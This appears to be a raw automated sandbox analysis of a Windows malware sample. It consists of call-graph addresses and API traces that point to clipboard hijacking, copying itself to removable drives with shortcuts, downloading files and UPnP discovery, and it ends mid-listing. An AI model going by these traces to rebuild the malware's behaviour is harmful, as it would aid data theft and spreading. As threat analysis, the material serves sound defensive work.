EnterCriticalSection 5755->5789 5757 407232 5757->5722 5758->5737 5762 407293 5759->5762 5760 407254 5760->5741 5760->5742 5762->5760 5763 405ef0 EnterCriticalSection 5762->5763 5764 40d1d0 71 API calls 5763->5764 5765 405f0e 5764->5765 5766 405fcb LeaveCriticalSection 5765->5766 5767 405f27 5765->5767 5771 405f48 5765->5771 5766->5762 5768 405f31 memcpy 5767->5768 5769 405f46 5767->5769 5768->5769 5770 40ab60 __aligned_recalloc_base 3 API calls 5769->5770 5772 405fc8 5770->5772 5771->5769 5773 405fa6 memcpy 5771->5773 5772->5766 5773->5769 5775 40be30 18 API calls 5774->5775 5776 407385 5775->5776 5776->5746 5778 405ffe 5777->5778 5779 40608a LeaveCriticalSection 5778->5779 5780 40abd0 8 API calls 5778->5780 5779->5750 5781 40605c 5780->5781 5781->5779 5783 40a950 __aligned_recalloc_base 7 API calls 5782->5783 5784 407182 memcpy 5783->5784 5785 40be30 18 API calls 5784->5785 5786 4071ec 5785->5786 5787 40ab60 __aligned_recalloc_base 3 API calls 5786->5787 5788 407151 5787->5788 5788->5753 5814 40d230 5789->5814 5792 4062e3 LeaveCriticalSection 5792->5757 5793 40d1d0 71 API calls 5796 4060d9 5793->5796 5794 4061f8 5795 406221 5794->5795 5798 405d30 70 API calls 5794->5798 5799 40ab60 __aligned_recalloc_base 3 API calls 5795->5799 5796->5792 5796->5794 5797 406134 memcpy 5796->5797 5800 40ab60 __aligned_recalloc_base 3 API calls 5797->5800 5798->5795 5801 406242 5799->5801 5802 406158 5800->5802 5801->5792 5803 406251 CreateFileW 5801->5803 5804 40abd0 8 API calls 5802->5804 5803->5792 5805 406274 5803->5805 5806 406168 5804->5806 5809 406291 WriteFile 5805->5809 5810 4062cf FlushFileBuffers 5805->5810 5807 40ab60 __aligned_recalloc_base 3 API calls 5806->5807 5808 40618f 5807->5808 5811 40cb40 7 API calls 5808->5811 5809->5805 5810->5792 5812 4061c5 5811->5812 5813 4076c0 66 API calls 5812->5813 5813->5794 5817 40c780 5814->5817 5818 40c791 5817->5818 5819 40abd0 8 API calls 5818->5819 5820 40c7ab 5818->5820 5821 40c6e0 70 API calls 5818->5821 5824 4084a0 68 API calls 5818->5824 5825 40c7eb memcmp 5818->5825 5819->5818 5822 40ab60 __aligned_recalloc_base 3 API calls 5820->5822 5821->5818 5823 4060c2 5822->5823 5823->5792 5823->5793 5824->5818 5825->5818 5825->5820 5829 407840 5826->5829 5827 407868 Sleep 5827->5829 5828 40791a Sleep 5828->5829 5829->5827 5829->5828 5830 407897 Sleep wsprintfA DeleteUrlCacheEntry 5829->5830 5832 40f560 58 API calls 5829->5832 5857 40f4b0 InternetOpenA 5830->5857 5832->5829 5834 4058c9 memset GetModuleHandleW 5833->5834 5835 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5834->5835 5835->5835 5836 405940 CreateWindowExW 5835->5836 5837 40596b 5836->5837 5838 40596d GetMessageA 5836->5838 5839 40599f ExitThread 5837->5839 5840 405981 TranslateMessage DispatchMessageA 5838->5840 5841 405997 5838->5841 5840->5838 5841->5834 5841->5839 5864 40f1f0 CreateFileW 5842->5864 5844 4070f8 ExitThread 5846 406fa0 5846->5844 5847 4070e8 Sleep 5846->5847 5848 406fd9 5846->5848 5867 4063e0 GetLogicalDrives 5846->5867 5847->5846 5873 406300 5848->5873 5851 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5853 407086 wsprintfW 5851->5853 5854 40709b wsprintfW 5851->5854 5852 40700b 5853->5854 5879 4068e0 _chkstk 5854->5879 5858 40f4d6 InternetOpenUrlA 5857->5858 5859 40f548 Sleep 5857->5859 5860 40f4f5 HttpQueryInfoA 5858->5860 5861 40f53e InternetCloseHandle 5858->5861 5859->5829 5862 40f534 InternetCloseHandle 5860->5862 5863 40f51e 5860->5863 5861->5859 5862->5861 5863->5862 5865 40f238 5864->5865 5866 40f21f GetFileSize 5864->5866 5865->5846 5866->5865 5872 40640d 5867->5872 5868 406486 5868->5846 5869 40641c RegOpenKeyExW 5870 40643e RegQueryValueExW 5869->5870 5869->5872 5871 40647a RegCloseKey 5870->5871 5870->5872 5871->5872 5872->5868 5872->5869 5872->5871 5874 406359 5873->5874 5875 40631c 5873->5875 5874->5851 5874->5852 5938 406360 GetDriveTypeW 5875->5938 5878 40634b lstrcpyW 5878->5874 5880 4068f7 5879->5880 5881 4068fe 7 API calls 5879->5881 5880->5852 5882 4069d2 5881->5882 5883 406a14 PathFileExistsW 5881->5883 5886 40f1f0 2 API calls 5882->5886 5884 406ac4 5883->5884 5885 406a29 PathFileExistsW 5883->5885 5889 406af5 PathFileExistsW 5884->5889 5943 4064a0 7 API calls 5884->5943 5887 406a59 PathFileExistsW 5885->5887 5888 406a3a SetFileAttributesW DeleteFileW 5885->5888 5890 4069de 5886->5890 5893 406a6a CreateDirectoryW 5887->5893 5894 406a8c PathFileExistsW 5887->5894 5888->5887 5891 406b06 5889->5891 5892 406b47 PathFileExistsW 5889->5892 5890->5883 5896 4069f5 SetFileAttributesW DeleteFileW 5890->5896 5897 40f1f0 2 API calls 5891->5897 5899 406b58 5892->5899 5900 406bca PathFileExistsW 5892->5900 5893->5894 5898 406a7d SetFileAttributesW 5893->5898 5894->5884 5901 406a9d CopyFileW 5894->5901 5896->5883 5903 406b12 5897->5903 5898->5894 5899->5900 5904 406b64 PathFileExistsW 5899->5904 5906 406c75 FindFirstFileW 5900->5906 5907 406bdf PathFileExistsW 5900->5907 5901->5884 5905 406ab5 SetFileAttributesW 5901->5905 5902 406ad4 5902->5889 5912 40f1f0 2 API calls 5902->5912 5903->5892 5908 406b28 SetFileAttributesW DeleteFileW 5903->5908 5904->5900 5909 406b73 CopyFileW 5904->5909 5905->5884 5906->5880 5935 406c9c 5906->5935 5910 406bf0 5907->5910 5911 406c2c 5907->5911 5908->5892 5909->5900 5915 406b8b SetFileAttributesW PathFileExistsW 5909->5915 5916 406c12 5910->5916 5917 406bf8 5910->5917 5913 406c34 5911->5913 5914 406c4e 5911->5914 5919 406aed 5912->5919 5922 406660 4 API calls 5913->5922 5923 406660 4 API calls 5914->5923 5915->5900 5924 406bab SetFileAttributesW DeleteFileW 5915->5924 5921 406660 4 API calls 5916->5921 5954 406660 CoInitialize CoCreateInstance 5917->5954 5918 406d5e lstrcmpW 5920 406d74 lstrcmpW 5918->5920 5918->5935 5919->5889 5920->5935 5927 406c0d SetFileAttributesW 5921->5927 5922->5927 5923->5927 5924->5900 5926 406f35 FindNextFileW 5926->5918 5929 406f51 FindClose 5926->5929 5927->5906 5929->5880 5930 406dba lstrcmpiW 5930->5935 5931 406e21 PathMatchSpecW 5933 406e42 wsprintfW SetFileAttributesW DeleteFileW 5931->5933 5931->5935 5932 406e9f PathFileExistsW 5934 406eb5 wsprintfW wsprintfW 5932->5934 5932->5935 5933->5935 5934->5935 5936 406f1f MoveFileExW 5934->5936 5935->5918 5935->5926 5935->5930 5935->5931 5935->5932 5959 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5935->5959 5936->5926 5939 40633f 5938->5939 5940 406388 5938->5940 5939->5874 5939->5878 5940->5939 5941 40639c QueryDosDeviceW 5940->5941 5941->5939 5942 4063b6 StrCmpNW 5941->5942 5942->5939 5944 406640 InternetCloseHandle 5943->5944 5945 40653e InternetOpenUrlW 5943->5945 5944->5902 5946 406633 InternetCloseHandle 5945->5946 5947 40656b CreateFileW 5945->5947 5946->5944 5948 406626 5947->5948 5949 406598 InternetReadFile 5947->5949 5948->5946 5950 4065eb wsprintfW DeleteFileW 5949->5950 5951 4065bc 5949->5951 5950->5948 5951->5950 5952 4065c5 WriteFile 5951->5952 5952->5949 5955 406696 5954->5955 5958 4066ee 5954->5958 5956 4066a9 wsprintfW 5955->5956 5957 4066cf wsprintfW 5955->5957 5955->5958 5956->5958 5957->5958 5958->5927 5960 4067f5 lstrcmpW 5959->5960 5961 4068cf 5959->5961 5962 406821 5960->5962 5963 40680b lstrcmpW 5960->5963 5961->5935 5965 40689c FindNextFileW 5962->5965 5963->5962 5964 406823 wsprintfW wsprintfW 5963->5964 5964->5962 5966 406886 MoveFileExW 5964->5966 5965->5960 5967 4068b8 FindClose RemoveDirectoryW 5965->5967 5966->5965 5967->5961 6200 40eba1 6202 40ebaa 6200->6202 6201 40ec9d 6202->6201 6203 40ec13 lstrcmpiW 6202->6203 6204 40ec93 SysFreeString 6203->6204 6205 40ec26 6203->6205 6204->6201 6206 40e990 2 API calls 6205->6206 6208 40ec34 6206->6208 6207 40ec85 6207->6204 6208->6204 6208->6207 6209 40ec63 lstrcmpiW 6208->6209 6210 40ec75 6209->6210 6211 40ec7b SysFreeString 6209->6211 6210->6211 6211->6207 6212 406de4 6214 406d8a 6212->6214 6213 406dba lstrcmpiW 6213->6214 6214->6213 6215 406f35 FindNextFileW 6214->6215 6218 406e21 PathMatchSpecW 6214->6218 6220 406e9f PathFileExistsW 6214->6220 6225 4067a0 11 API calls 6214->6225 6216 406f51 FindClose 6215->6216 6217 406d5e lstrcmpW 6215->6217 6221 406f5e 6216->6221 6217->6214 6219 406d74 lstrcmpW 6217->6219 6218->6214 6222 406e42 wsprintfW SetFileAttributesW DeleteFileW 6218->6222 6219->6214 6220->6214 6223 406eb5 wsprintfW wsprintfW 6220->6223 6222->6214 6223->6214 6224 406f1f MoveFileExW 6223->6224 6224->6215 6225->6214 6074 406085 6076 405ffe 6074->6076 6075 40608a LeaveCriticalSection 6076->6075 6077 40abd0 8 API calls 6076->6077 6078 40605c 6077->6078 6078->6075 6079 406fc6 6082 406fa8 6079->6082 6080 4070e8 Sleep 6080->6082 6081 406fd9 6083 406300 4 API calls 6081->6083 6082->6080 6082->6081 6084 4070f8 ExitThread 6082->6084 6085 4063e0 4 API calls 6082->6085 6087 406fea 6083->6087 6085->6082 6086 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6089 407086 wsprintfW 6086->6089 6090 40709b wsprintfW 6086->6090 6087->6086 6088 40700b 6087->6088 6089->6090 6091 4068e0 79 API calls 6090->6091 6091->6088 6092 40f908 6093 40f910 6092->6093 6095 40f9c4 6093->6095 6098 40fb45 6093->6098 6097 40f949 6097->6095 6102 40fa30 RtlUnwind 6097->6102 6099 40fb5a 6098->6099 6101 40fb76 6098->6101 6100 40fbe5 NtQueryVirtualMemory 6099->6100 6099->6101 6100->6101 6101->6097 6103 40fa48 6102->6103 6103->6097 6226 40792a ExitThread 5968 4059b0 GetWindowLongW 5969 4059d4 5968->5969 5970 4059f6 5968->5970 5971 4059e1 5969->5971 5972 405a67 IsClipboardFormatAvailable 5969->5972 5973 4059f1 5970->5973 5977 405a46 5970->5977 5978 405a2e SetWindowLongW 5970->5978 5974 405a04 SetClipboardViewer SetWindowLongW 5971->5974 5975 4059e7 5971->5975 5979 405a83 IsClipboardFormatAvailable 5972->5979 5980 405a7a 5972->5980 5976 405be4 DefWindowProcA 5973->5976 5974->5976 5975->5973 5982 405b9d RegisterRawInputDevices ChangeClipboardChain 5975->5982 5977->5973 5983 405a4c SendMessageA 5977->5983 5978->5973 5979->5980 5981 405a98 IsClipboardFormatAvailable 5979->5981 5984 405ab5 OpenClipboard 5980->5984 5985 405b7f 5980->5985 5981->5980 5982->5976 5983->5973 5984->5985 5986 405ac5 GetClipboardData 5984->5986 5985->5973 5987 405b85 SendMessageA 5985->5987 5986->5973 5988 405add GlobalLock 5986->5988 5987->5973 5988->5973 5989 405af5 5988->5989 5990 405b08 5989->5990 5991 405b29 5989->5991 5993 405b3e 5990->5993 5994 405b0e 5990->5994 5992 40d250 13 API calls 5991->5992 5995 405b14 GlobalUnlock CloseClipboard 5992->5995 6010 4057f0 5993->6010 5994->5995 6004 405680 5994->6004 5995->5985 5999 405b67 5995->5999 6018 404970 lstrlenW 5999->6018 6002 40ab60 __aligned_recalloc_base 3 API calls 6003 405b7c 6002->6003 6003->5985 6005 40568b 6004->6005 6006 405691 lstrlenW 6005->6006 6007 4056a4 6005->6007 6008 40a950 __aligned_recalloc_base 7 API calls 6005->6008 6009 4056c1 lstrcpynW 6005->6009 6006->6005 6006->6007 6007->5995 6008->6005 6009->6005 6009->6007 6015 4057fd 6010->6015 6011 405803 lstrlenA 6012 405816 6011->6012 6011->6015 6012->5995 6013 405740 2 API calls 6013->6015 6014 40a950 __aligned_recalloc_base 7 API calls 6014->6015 6015->6011 6015->6012 6015->6013 6015->6014 6017 40ab60 __aligned_recalloc_base 3 API calls 6015->6017 6052 4057a0 6015->6052 6017->6015 6026 4049a4 6018->6026 6019 404bfd 6019->6002 6020 404e81 StrStrW 6021 404e94 6020->6021 6022 404e98 StrStrW 6020->6022 6021->6022 6024 404eab 6022->6024 6025 404eaf StrStrW 6022->6025 6023 404c0f 6023->6019 6023->6020 6024->6025 6027 404ec2 6025->6027 6026->6019 6026->6023 6029 404d90 StrStrW 6026->6029 6036 404ed8 6027->6036 6057 4048a0 lstrlenW 6027->6057 6029->6023 6030 404dbb StrStrW 6029->6030 6030->6023 6031 404de6 StrStrW 6030->6031 6031->6023 6032 4054aa StrStrW 6037 4054c4 StrStrW 6032->6037 6038 4054bd 6032->6038 6033 40544f StrStrW 6034 405462 6033->6034 6035 40546b StrStrW 6033->6035 6034->6032 6035->6034 6041 405487 StrStrW 6035->6041 6036->6019 6036->6032 6036->6033 6039 4054d7 6037->6039 6040 4054de StrStrW 6037->6040 6038->6037 6039->6040 6042 4054f1 6040->6042 6043 4054f8 StrStrW 6040->6043 6041->6034 6042->6043 6044 405512 StrStrW 6043->6044 6045 40550b 6043->6045 6046 405525 lstrlenA 6044->6046 6045->6044 6046->6019 6048 4055ff GlobalAlloc 6046->6048 6048->6019 6049 40561a GlobalLock 6048->6049 6049->6019 6050 40562d memcpy GlobalUnlock OpenClipboard 6049->6050 6050->6019 6051 40565a EmptyClipboard SetClipboardData CloseClipboard 6050->6051 6051->6019 6053 4057ab 6052->6053 6054 4057b1 lstrlenA 6053->6054 6055 405740 2 API calls 6053->6055 6056 4057e4 6053->6056 6054->6053 6055->6053 6056->6015 6061 4048c4 6057->6061 6058 40490d 6058->6036 6059 404911 iswalpha 6060 40492c iswdigit 6059->6060 6059->6061 6060->6061 6061->6058 6061->6059 6061->6060 6118 40db50 6123 401b60 6118->6123 6120 40db65 6121 401b60 16 API calls 6120->6121 6122 40db84 6120->6122 6121->6122 6124 401b70 6123->6124 6142 401c42 6123->6142 6125 40a740 7 API calls 6124->6125 6124->6142 6126 401b9d 6125->6126 6127 40abd0 8 API calls 6126->6127 6126->6142 6128 401bc9 6127->6128 6129 401be6 6128->6129 6130 401bd6 6128->6130 6132 401ae0 4 API calls 6129->6132 6131 40ab60 __aligned_recalloc_base 3 API calls 6130->6131 6133 401bdc 6131->6133 6134 401bf3 6132->6134 6133->6120 6135 401c33 6134->6135 6136 401bfc EnterCriticalSection 6134->6136 6137 40ab60 __aligned_recalloc_base 3 API calls 6135->6137 6138 401c13 6136->6138 6139 401c1f LeaveCriticalSection 6136->6139 6140 401c3c 6137->6140 6138->6139 6139->6120 6141 40ab60 __aligned_recalloc_base 3 API calls 6140->6141 6141->6142 6142->6120 6143 40df50 6144 40bf20 330 API calls 6143->6144 6145 40df88 6144->6145 6146 40d510 6151 40b6f0 6146->6151 6149 40d550 330 API calls 6150 40d53a 6149->6150 6152 40b780 2 API calls 6151->6152 6153 40b6ff 6152->6153 6154 40b709 6153->6154 6155 40b70d EnterCriticalSection 6153->6155 6154->6149 6154->6150 6157 40b72c LeaveCriticalSection 6155->6157 6157->6154 6158 40f910 6159 40f92e 6158->6159 6161 40f9c4 6158->6161 6160 40fb45 NtQueryVirtualMemory 6159->6160 6163 40f949 6160->6163 6162 40fa30 RtlUnwind 6162->6163 6163->6161 6163->6162 6164 40d9d0 6165 40da3e 6164->6165 6166 40d9e6 6164->6166 6166->6165 6167 40d9f0 6166->6167 6168 40da43 6166->6168 6169 40da93 6166->6169 6172 40a740 7 API calls 6167->6172 6170 40da68 6168->6170 6171 40da5b InterlockedDecrement 6168->6171 6191 40c570 6169->6191 6174 40ab60 __aligned_recalloc_base 3 API calls 6170->6174 6171->6170 6175 40d9fd 6172->6175 6176 40da74 6174->6176 6187 4023d0 6175->6187 6178 40ab60 __aligned_recalloc_base 3 API calls 6176->6178 6178->6165 6180 40b6f0 4 API calls 6182 40da1f 6180->6182 6181 40dab9 6181->6165 6184 40daf1 IsBadReadPtr 6181->6184 6186 40bf20 330 API calls 6181->6186 6196 40c670 6181->6196 6182->6165 6183 40da2b InterlockedIncrement 6182->6183 6183->6165 6184->6181 6186->6181 6188 402413 6187->6188 6189 4023d9 6187->6189 6188->6180 6189->6188 6190 4023ea InterlockedIncrement 6189->6190 6190->6188 6192 40c583 6191->6192 6193 40c5ad memcpy 6191->6193 6194 40a990 9 API calls 6192->6194 6193->6181 6195 40c5a4 6194->6195 6195->6193 6197 40c699 6196->6197 6198 40c68e 6196->6198 6197->6198 6199 40c6b1 memmove 6197->6199 6198->6181 6199->6198 6227 4084f9 6228 408502 6227->6228 6229 408511 34 API calls 6228->6229 6230 409346 6228->6230 6231 405fbd 6232 405f51 6231->6232 6233 405fbb 6232->6233 6237 405fa6 memcpy 6232->6237 6234 40ab60 __aligned_recalloc_base 3 API calls 6233->6234 6235 405fc8 LeaveCriticalSection 6234->6235 6237->6233 6238 40ac3e 6239 40ab60 __aligned_recalloc_base 3 API calls 6238->6239 6242 40abfd 6239->6242 6240 40ac12 6241 40a950 __aligned_recalloc_base 7 API calls 6241->6242 6242->6240 6242->6241 6243 40ac14 memcpy 6242->6243 6243->6242

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 291 40e190-40e1b7 socket 292 40e2f1-40e2f5 291->292 293 40e1bd-40e285 htons inet_addr setsockopt call 40b430 bind lstrlenA sendto ioctlsocket 291->293 294 40e2f7-40e2fd 292->294 295 40e2ff-40e305 292->295 298 40e28b-40e292 293->298 294->295 299 40e294-40e2a3 call 40e310 298->299 300 40e2e5-40e2e9 call 40b4f0 298->300 304 40e2a8-40e2b0 299->304 303 40e2ee 300->303 303->292 305 40e2b2 304->305 306 40e2b4-40e2e3 call 40a990 304->306 305->300 306->298
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                      • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                      • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                      • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                        • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                        • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                        • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                        • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                                      • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                      • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                      • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                      • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                        • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                        • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                      • String ID: 239.255.255.250$X#A
                                                                                                                                                                                                      • API String ID: 726339449-2206458040
                                                                                                                                                                                                      • Opcode ID: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
                                                                                                                                                                                                      • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                                                                                      Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 359 402020-402032 call 40a740 362 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 359->362 363 4021aa-4021ae 359->363 364 402076-402089 CreateIoCompletionPort 362->364 365 40219f-4021a8 call 401600 362->365 364->365 366 40208f-402099 call 40dbb0 364->366 365->363 366->365 371 40209f-4020b7 WSASocketA 366->371 371->365 372 4020bd-402120 setsockopt htons bind 371->372 372->365 373 402126-402138 listen 372->373 373->365 374 40213a-402145 WSACreateEvent 373->374 374->365 375 402147-402157 WSAEventSelect 374->375 375->365 376 402159-40215f 375->376 377 402161-402171 call 40dbe0 376->377 378 40217f-40218f call 40dbe0 376->378 381 402176-40217d 377->381 382 402194-40219e 378->382 381->377 381->378
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                        • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                                                                                      • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                                      • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                                      • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                                      • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1603358586-0
                                                                                                                                                                                                      • Opcode ID: ac805520964283d74d9ea396830670e37537a1ffc2c4ae4913da21a2650ffd4a
                                                                                                                                                                                                      • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac805520964283d74d9ea396830670e37537a1ffc2c4ae4913da21a2650ffd4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                                                                                      Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                                      • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                        • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                                                                                        • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                                                                                        • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4174406920-0
                                                                                                                                                                                                      • Opcode ID: c86c4c205b70a7c70dcf50f9a49c850a55a024fca25fb314c9702e9f639428b6
                                                                                                                                                                                                      • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c86c4c205b70a7c70dcf50f9a49c850a55a024fca25fb314c9702e9f639428b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                                                                                      Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D782
